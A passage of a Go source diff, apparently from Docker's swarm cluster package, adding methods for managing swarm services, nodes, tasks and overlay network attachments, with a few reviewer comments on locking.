convert.SwarmFromGRPC(*swarm), nil +} + +// Update updates configuration of a managed swarm cluster. +func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + swarm, err := getSwarm(ctx, c.client) + if err != nil { + return err + } + + // In update, client should provide the complete spec of the swarm, including + // Name and Labels. 
If a field is specified with 0 or nil, then the default value + // will be used to swarmkit. + clusterSpec, err := convert.SwarmSpecToGRPC(spec) + if err != nil { + return err + } + + _, err = c.client.UpdateCluster( + ctx, + &swarmapi.UpdateClusterRequest{ + ClusterID: swarm.ID, + Spec: &clusterSpec, + ClusterVersion: &swarmapi.Version{ + Index: version, + }, + Rotation: swarmapi.KeyRotation{ + WorkerJoinToken: flags.RotateWorkerToken, + ManagerJoinToken: flags.RotateManagerToken, + ManagerUnlockKey: flags.RotateManagerUnlockKey, + }, + }, + ) + return err +} + +// IsManager returns true if Cluster is participating as a manager. +func (c *Cluster) IsManager() bool { + c.RLock() + defer c.RUnlock() + return c.isActiveManager() +} + +// IsAgent returns true if Cluster is participating as a worker/agent. +func (c *Cluster) IsAgent() bool { + c.RLock() + defer c.RUnlock() + return c.node != nil && c.ready +} + +// GetLocalAddress returns the local address. +func (c *Cluster) GetLocalAddress() string { + c.RLock() + defer c.RUnlock() + return c.actualLocalAddr +} + +// GetListenAddress returns the listen address. +func (c *Cluster) GetListenAddress() string { + c.RLock() + defer c.RUnlock() + if c.node != nil { + return c.node.config.ListenAddr + } + return "" +} + +// GetAdvertiseAddress returns the remotely reachable address of this node. +func (c *Cluster) GetAdvertiseAddress() string { + c.RLock() + defer c.RUnlock() + if c.node != nil && c.node.config.AdvertiseAddr != "" { + advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr) + return advertiseHost + } + return c.actualLocalAddr +} + +// GetRemoteAddress returns a known advertise address of a remote manager if +// available. 
+// todo: change to array/connect with info
+func (c *Cluster) GetRemoteAddress() string {
+	c.RLock()
+	defer c.RUnlock()
+	return c.getRemoteAddress()
+}
+
+// getRemoteAddress returns the address of the first known remote that is not
+// this node, or "" if there is none. Call with the read lock held.
+func (c *Cluster) getRemoteAddress() string {
+	if c.node == nil {
+		return ""
+	}
+	nodeID := c.node.NodeID()
+	for _, r := range c.node.Remotes() {
+		if r.NodeID != nodeID {
+			return r.Addr
+		}
+	}
+	return ""
+}
+
+// ListenClusterEvents returns a channel that receives messages on cluster
+// participation changes.
+// todo: make cancelable and accessible to multiple callers
+func (c *Cluster) ListenClusterEvents() <-chan struct{} {
+	return c.configEvent
+}
+
+// Info returns information about the current cluster state.
+func (c *Cluster) Info() types.Info {
+	info := types.Info{
+		NodeAddr: c.GetAdvertiseAddress(),
+	}
+
+	c.RLock()
+	defer c.RUnlock()
+
+	// Derive the local node state: inactive/error/locked when no node is
+	// running; pending/active/locked when one is.
+	if c.node == nil {
+		info.LocalNodeState = types.LocalNodeStateInactive
+		if c.cancelDelay != nil {
+			info.LocalNodeState = types.LocalNodeStateError
+		}
+		if c.locked {
+			info.LocalNodeState = types.LocalNodeStateLocked
+		} else if c.err == ErrSwarmCertificatesExpired {
+			info.LocalNodeState = types.LocalNodeStateError
+		}
+	} else {
+		info.LocalNodeState = types.LocalNodeStatePending
+		if c.ready {
+			info.LocalNodeState = types.LocalNodeStateActive
+		} else if c.locked {
+			info.LocalNodeState = types.LocalNodeStateLocked
+		}
+	}
+	if c.err != nil {
+		info.Error = c.err.Error()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	if c.isActiveManager() {
+		info.ControlAvailable = true
+		// NOTE(review): Inspect re-acquires c.RLock while this goroutine
+		// already holds it; Go's RWMutex does not allow recursive read
+		// locking if a writer is queued — confirm this cannot deadlock.
+		swarm, err := c.Inspect()
+		if err != nil {
+			info.Error = err.Error()
+		}
+
+		// Strip JoinTokens
+		info.Cluster = swarm.ClusterInfo
+
+		// Best-effort: node and manager counts are simply omitted if the
+		// ListNodes call fails.
+		if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil {
+			info.Nodes = len(r.Nodes)
+			for _, n := range r.Nodes {
+				if n.ManagerStatus != nil {
+					info.Managers++
+				}
+			}
+		}
+	}
+
+	if c.node != nil {
+		for _, r := range c.node.Remotes() {
+			info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr})
+		}
+		info.NodeID = c.node.NodeID()
+	}
+
+	return info
+}
+
+// isActiveManager should not be called without a read lock
+func (c *Cluster) isActiveManager() bool {
+	return c.node != nil && c.conn != nil
+}
+
+// swarmExists should not be called without a read lock
+func (c *Cluster) swarmExists() bool {
+	return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired
+}
+
+// errNoManager returns error describing why manager commands can't be used.
+// Call with read lock.
+func (c *Cluster) errNoManager() error {
+	if c.node == nil {
+		if c.locked {
+			return ErrSwarmLocked
+		}
+		if c.err == ErrSwarmCertificatesExpired {
+			return ErrSwarmCertificatesExpired
+		}
+		return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
+	}
+	if c.node.Manager() != nil {
+		return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.")
+	}
+	return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.")
+}
+
+// GetServices returns all services of a managed swarm cluster.
+func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListServicesFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListServices( + ctx, + &swarmapi.ListServicesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + services := []types.Service{} + + for _, service := range r.Services { + services = append(services, convert.ServiceFromGRPC(*service)) + } + + return services, nil +} + +// imageWithDigestString takes an image such as name or name:tag +// and returns the image pinned to a digest, such as name@sha256:34234... +// Due to the difference between the docker/docker/reference, and the +// docker/distribution/reference packages, we're parsing the image twice. +// As the two packages converge, this function should be simplified. +// TODO(nishanttotla): After the packages converge, the function must +// convert distreference.Named -> distreference.Canonical, and the logic simplified. +func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { + if _, err := digest.ParseDigest(image); err == nil { + return "", errors.New("image reference is an image ID") + } + ref, err := distreference.ParseNamed(image) + if err != nil { + return "", err + } + // only query registry if not a canonical reference (i.e. 
with digest) + if _, ok := ref.(distreference.Canonical); !ok { + // create a docker/docker/reference Named object because GetRepository needs it + dockerRef, err := reference.ParseNamed(image) + if err != nil { + return "", err + } + dockerRef = reference.WithDefaultTag(dockerRef) + namedTaggedRef, ok := dockerRef.(reference.NamedTagged) + if !ok { + return "", fmt.Errorf("unable to cast image to NamedTagged reference object") + } + + repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig) + if err != nil { + return "", err + } + dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag()) + if err != nil { + return "", err + } + + namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest) + if err != nil { + return "", err + } + return namedDigestedRef.String(), nil + } + // reference already contains a digest, so just return it + return ref.String(), nil +} + +// CreateService creates a new service in a managed swarm cluster. 
+func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + err := c.populateNetworkID(ctx, c.client, &s) + if err != nil { + return nil, err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(s) + if err != nil { + return nil, err + } + + ctnr := serviceSpec.Task.GetContainer() + if ctnr == nil { + return nil, fmt.Errorf("service does not use container tasks") + } + + if encodedAuth != "" { + ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + resp := &apitypes.ServiceCreateResponse{} + + // pin image by digest + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) + resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())) + } else if ctnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) + ctnr.Image = digestImage + } else { + logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) + } + } + + r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return nil, err + } + + resp.ID = r.Service.ID + return resp, nil +} + +// GetService returns a service based on an ID or name. 
+func (c *Cluster) GetService(input string) (types.Service, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Service{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + service, err := getService(ctx, c.client, input) + if err != nil { + return types.Service{}, err + } + return convert.ServiceFromGRPC(*service), nil +} + +// UpdateService updates existing service to match new properties. +func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + err := c.populateNetworkID(ctx, c.client, &spec) + if err != nil { + return nil, err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(spec) + if err != nil { + return nil, err + } + + currentService, err := getService(ctx, c.client, serviceIDOrName) + if err != nil { + return nil, err + } + + newCtnr := serviceSpec.Task.GetContainer() + if newCtnr == nil { + return nil, fmt.Errorf("service does not use container tasks") + } + + if encodedAuth != "" { + newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } else { + // this is needed because if the encodedAuth isn't being updated then we + // shouldn't lose it, and continue to use the one that was already present + var ctnr *swarmapi.ContainerSpec + switch registryAuthFrom { + case apitypes.RegistryAuthFromSpec, "": + ctnr = currentService.Spec.Task.GetContainer() + case apitypes.RegistryAuthFromPreviousSpec: + if currentService.PreviousSpec == nil { + return nil, fmt.Errorf("service does not have a previous spec") + } + ctnr = currentService.PreviousSpec.Task.GetContainer() + default: + return nil, fmt.Errorf("unsupported registryAuthFromValue") + } + if ctnr == nil { + return nil, 
fmt.Errorf("service does not use container tasks") + } + newCtnr.PullOptions = ctnr.PullOptions + // update encodedAuth so it can be used to pin image by digest + if ctnr.PullOptions != nil { + encodedAuth = ctnr.PullOptions.RegistryAuth + } + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + resp := &apitypes.ServiceUpdateResponse{} + + // pin image by digest + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) + resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())) + } else if newCtnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) + newCtnr.Image = digestImage + } else { + logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) + } + } + + _, err = c.client.UpdateService( + ctx, + &swarmapi.UpdateServiceRequest{ + ServiceID: currentService.ID, + Spec: &serviceSpec, + ServiceVersion: &swarmapi.Version{ + Index: version, + }, + }, + ) + + return resp, err +} + +// RemoveService removes a service from a managed swarm cluster. 
+func (c *Cluster) RemoveService(input string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + service, err := getService(ctx, c.client, input) + if err != nil { + return err + } + + if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil { + return err + } + return nil +} + +// ServiceLogs collects service logs and writes them back to `config.OutStream` +func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error { + c.RLock() + if !c.isActiveManager() { + c.RUnlock() + return c.errNoManager() + } + + service, err := getService(ctx, c.client, input) + if err != nil { + c.RUnlock() + return err + } + + stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ + Selector: &swarmapi.LogSelector{ + ServiceIDs: []string{service.ID}, + }, + Options: &swarmapi.LogSubscriptionOptions{ + Follow: config.Follow, + }, + }) + if err != nil { + c.RUnlock() + return err + } + + wf := ioutils.NewWriteFlusher(config.OutStream) + defer wf.Close() + close(started) + wf.Flush() + + outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout) + errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr) + + // Release the lock before starting the stream. + c.RUnlock() + for { + // Check the context before doing anything. + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + subscribeMsg, err := stream.Recv() + if err == io.EOF { + return nil + } + if err != nil { + return err + } + + for _, msg := range subscribeMsg.Messages { + data := []byte{} + + if config.Timestamps { + ts, err := ptypes.Timestamp(msg.Timestamp) + if err != nil { + return err + } + data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...) 
+ } + + data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ", + contextPrefix, msg.Context.NodeID, + contextPrefix, msg.Context.ServiceID, + contextPrefix, msg.Context.TaskID, + ))...) + + data = append(data, msg.Data...) + + switch msg.Stream { + case swarmapi.LogStreamStdout: + outStream.Write(data) + case swarmapi.LogStreamStderr: + errStream.Write(data) + } + } + } +} + +// GetNodes returns a list of all nodes known to a cluster. +func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListNodesFilters(options.Filters) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListNodes( + ctx, + &swarmapi.ListNodesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + nodes := []types.Node{} + + for _, node := range r.Nodes { + nodes = append(nodes, convert.NodeFromGRPC(*node)) + } + return nodes, nil +} + +// GetNode returns a node based on an ID or name. +func (c *Cluster) GetNode(input string) (types.Node, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Node{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + node, err := getNode(ctx, c.client, input) + if err != nil { + return types.Node{}, err + } + return convert.NodeFromGRPC(*node), nil +} + +// UpdateNode updates existing nodes properties. 
+func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	nodeSpec, err := convert.NodeSpecToGRPC(spec)
+	if err != nil {
+		return err
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	// input may be a node ID or name; getNode resolves it to a concrete node.
+	currentNode, err := getNode(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	// NodeVersion carries the caller-supplied version index, presumably so
+	// the manager can reject concurrent updates — confirm against swarmkit.
+	_, err = c.client.UpdateNode(
+		ctx,
+		&swarmapi.UpdateNodeRequest{
+			NodeID: currentNode.ID,
+			Spec:   &nodeSpec,
+			NodeVersion: &swarmapi.Version{
+				Index: version,
+			},
+		},
+	)
+	return err
+}
+
+// RemoveNode removes a node from a cluster
+func (c *Cluster) RemoveNode(input string, force bool) error {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return c.errNoManager()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	// input may be a node ID or name; getNode resolves it to a concrete node.
+	node, err := getNode(ctx, c.client, input)
+	if err != nil {
+		return err
+	}
+
+	if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil {
+		return err
+	}
+	return nil
+}
+
+// GetTasks returns a list of tasks matching the filter options.
+func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + byName := func(filter filters.Args) error { + if filter.Include("service") { + serviceFilters := filter.Get("service") + for _, serviceFilter := range serviceFilters { + service, err := c.GetService(serviceFilter) + if err != nil { + return err + } + filter.Del("service", serviceFilter) + filter.Add("service", service.ID) + } + } + if filter.Include("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + node, err := c.GetNode(nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", node.ID) + } + } + return nil + } + + filters, err := newListTasksFilters(options.Filters, byName) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListTasks( + ctx, + &swarmapi.ListTasksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + tasks := []types.Task{} + + for _, task := range r.Tasks { + if task.Spec.GetContainer() != nil { + tasks = append(tasks, convert.TaskFromGRPC(*task)) + } + } + return tasks, nil +} + +// GetTask returns a task by an ID. +func (c *Cluster) GetTask(input string) (types.Task, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Task{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + task, err := getTask(ctx, c.client, input) + if err != nil { + return types.Task{}, err + } + return convert.TaskFromGRPC(*task), nil +} + +// GetNetwork returns a cluster network by an ID. 
+func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return apitypes.NetworkResource{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + network, err := getNetwork(ctx, c.client, input) + if err != nil { + return apitypes.NetworkResource{}, err + } + return convert.BasicNetworkFromGRPC(*network), nil +} + +func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + var networks []apitypes.NetworkResource + + for _, network := range r.Networks { + networks = append(networks, convert.BasicNetworkFromGRPC(*network)) + } + + return networks, nil +} + +// GetNetworks returns all current cluster managed networks. +func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { + return c.getNetworks(nil) +} + +// GetNetworksByName returns cluster managed networks by name. +// It is ok to have multiple networks here. #18864 +func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { + // Note that swarmapi.GetNetworkRequest.Name is not functional. + // So we cannot just use that with c.GetNetwork. + return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ + Names: []string{name}, + }) +} + +func attacherKey(target, containerID string) string { + return containerID + ":" + target +} + +// UpdateAttachment signals the attachment config to the attachment +// waiter who is trying to start or attach the container to the +// network. 
+func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error {
+	c.RLock()
+	attacher, ok := c.attachers[attacherKey(target, containerID)]
+	c.RUnlock()
+	if !ok || attacher == nil {
+		return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target)
+	}
+
+	// Hand the config to the AttachNetwork call blocked on attachWaitCh,
+	// then close the channel so at most one config is ever delivered.
+	attacher.attachWaitCh <- config
+	close(attacher.attachWaitCh)
+	return nil
+}
+
+// WaitForDetachment waits for the container to stop or detach from
+// the network.
+func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error {
+	c.RLock()
+	// Look up the attachment by network name first, falling back to the
+	// network ID.
+	attacher, ok := c.attachers[attacherKey(networkName, containerID)]
+	if !ok {
+		attacher, ok = c.attachers[attacherKey(networkID, containerID)]
+	}
+	if c.node == nil || c.node.Agent() == nil {
+		c.RUnlock()
+		return fmt.Errorf("invalid cluster node while waiting for detachment")
+	}
+
+	// Capture the agent before dropping the lock; the waits below must not
+	// hold the cluster lock.
+	agent := c.node.Agent()
+	c.RUnlock()
+
+	if ok && attacher != nil &&
+		attacher.detachWaitCh != nil &&
+		attacher.attachCompleteCh != nil {
+		// Attachment may be in progress still so wait for
+		// attachment to complete.
+		select {
+		case <-attacher.attachCompleteCh:
+		case <-ctx.Done():
+			return ctx.Err()
+		}
+
+		// Only wait for detach if this attachment still belongs to the
+		// task we were asked about (detachWaitCh is closed by DetachNetwork).
+		if attacher.taskID == taskID {
+			select {
+			case <-attacher.detachWaitCh:
+			case <-ctx.Done():
+				return ctx.Err()
+			}
+		}
+	}
+
+	return agent.ResourceAllocator().DetachNetwork(ctx, taskID)
+}
+
+// AttachNetwork generates an attachment request towards the manager.
+func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { + aKey := attacherKey(target, containerID) + c.Lock() + if c.node == nil || c.node.Agent() == nil { + c.Unlock() + return nil, fmt.Errorf("invalid cluster node while attaching to network") + } + if attacher, ok := c.attachers[aKey]; ok { + c.Unlock() + return attacher.config, nil + } + + agent := c.node.Agent() + attachWaitCh := make(chan *network.NetworkingConfig) + detachWaitCh := make(chan struct{}) + attachCompleteCh := make(chan struct{}) + c.attachers[aKey] = &attacher{ + attachWaitCh: attachWaitCh, + attachCompleteCh: attachCompleteCh, + detachWaitCh: detachWaitCh, + } + c.Unlock() + + ctx, cancel := c.getRequestContext() + defer cancel() + + taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) + if err != nil { + c.Lock() + delete(c.attachers, aKey) + c.Unlock() + return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) + } + + c.Lock() + c.attachers[aKey].taskID = taskID + close(attachCompleteCh) + c.Unlock() + + logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID) + + var config *network.NetworkingConfig + select { + case config = <-attachWaitCh: + case <-ctx.Done(): + return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) + } + + c.Lock() + c.attachers[aKey].config = config + c.Unlock() + return config, nil +} + +// DetachNetwork unblocks the waiters waiting on WaitForDetachment so +// that a request to detach can be generated towards the manager. 
+func (c *Cluster) DetachNetwork(target string, containerID string) error {
+	aKey := attacherKey(target, containerID)
+
+	// Remove the attachment entry under the lock so exactly one caller can
+	// observe ok==true and close the channel below.
+	c.Lock()
+	attacher, ok := c.attachers[aKey]
+	delete(c.attachers, aKey)
+	c.Unlock()
+
+	if !ok {
+		return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target)
+	}
+
+	// Wake any WaitForDetachment waiter blocked on this attachment.
+	close(attacher.detachWaitCh)
+	return nil
+}
+
+// CreateNetwork creates a new cluster managed network.
+func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) {
+	c.RLock()
+	defer c.RUnlock()
+
+	if !c.isActiveManager() {
+		return "", c.errNoManager()
+	}
+
+	// Pre-defined networks may not be recreated as cluster networks; report
+	// this as a forbidden-request API error.
+	if runconfig.IsPreDefinedNetwork(s.Name) {
+		err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name)
+		return "", apierrors.NewRequestForbiddenError(err)
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	networkSpec := convert.BasicNetworkCreateToGRPC(s)
+	r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec})
+	if err != nil {
+		return "", err
+	}
+
+	return r.Network.ID, nil
+}
+
+// RemoveNetwork removes a cluster network.
+func (c *Cluster) RemoveNetwork(input string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + network, err := getNetwork(ctx, c.client, input) + if err != nil { + return err + } + + if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil { + return err + } + return nil +} + +func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { + // Always prefer NetworkAttachmentConfigs from TaskTemplate + // but fallback to service spec for backward compatibility + networks := s.TaskTemplate.Networks + if len(networks) == 0 { + networks = s.Networks + } + + for i, n := range networks { + apiNetwork, err := getNetwork(ctx, client, n.Target) + if err != nil { + if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() { + err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) + return apierrors.NewRequestForbiddenError(err) + } + return err + } + networks[i].Target = apiNetwork.ID + } + return nil +} + +func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { + // GetNetwork to match via full ID. + rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}) + if err != nil { + // If any error (including NotFound), ListNetworks to match via ID prefix and full name. 
+ rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}}) + if err != nil || len(rl.Networks) == 0 { + rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Networks) == 0 { + return nil, fmt.Errorf("network %s not found", input) + } + + if l := len(rl.Networks); l > 1 { + return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l) + } + + return rl.Networks[0], nil + } + return rg.Network, nil +} + +// Cleanup stops active swarm node. This is run before daemon shutdown. +func (c *Cluster) Cleanup() { + c.Lock() + node := c.node + if node == nil { + c.Unlock() + return + } + defer c.Unlock() + if c.isActiveManager() { + active, reachable, unreachable, err := c.managerStats() + if err == nil { + singlenode := active && isLastManager(reachable, unreachable) + if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { + logrus.Errorf("Leaving cluster with %v managers left out of %v. 
Raft quorum will be lost.", reachable-1, reachable+unreachable) + } + } + } + c.stopNode() +} + +func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) + if err != nil { + return false, 0, 0, err + } + for _, n := range nodes.Nodes { + if n.ManagerStatus != nil { + if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE { + reachable++ + if n.ID == c.node.NodeID() { + current = true + } + } + if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_UNREACHABLE { + unreachable++ + } + } + } + return +} + +func validateAndSanitizeInitRequest(req *types.InitRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + + if req.Spec.Annotations.Name == "" { + req.Spec.Annotations.Name = "default" + } else if req.Spec.Annotations.Name != "default" { + return errors.New(`swarm spec must be named "default"`) + } + + return nil +} + +func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + if len(req.RemoteAddrs) == 0 { + return fmt.Errorf("at least 1 RemoteAddr is required to join") + } + for i := range req.RemoteAddrs { + req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i]) + if err != nil { + return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) + } + } + return nil +} + +func validateAddr(addr string) (string, error) { + if addr == "" { + return addr, fmt.Errorf("invalid empty address") + } + newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) + if err != nil { + return addr, nil + } + return strings.TrimPrefix(newaddr, "tcp://"), nil +} + 
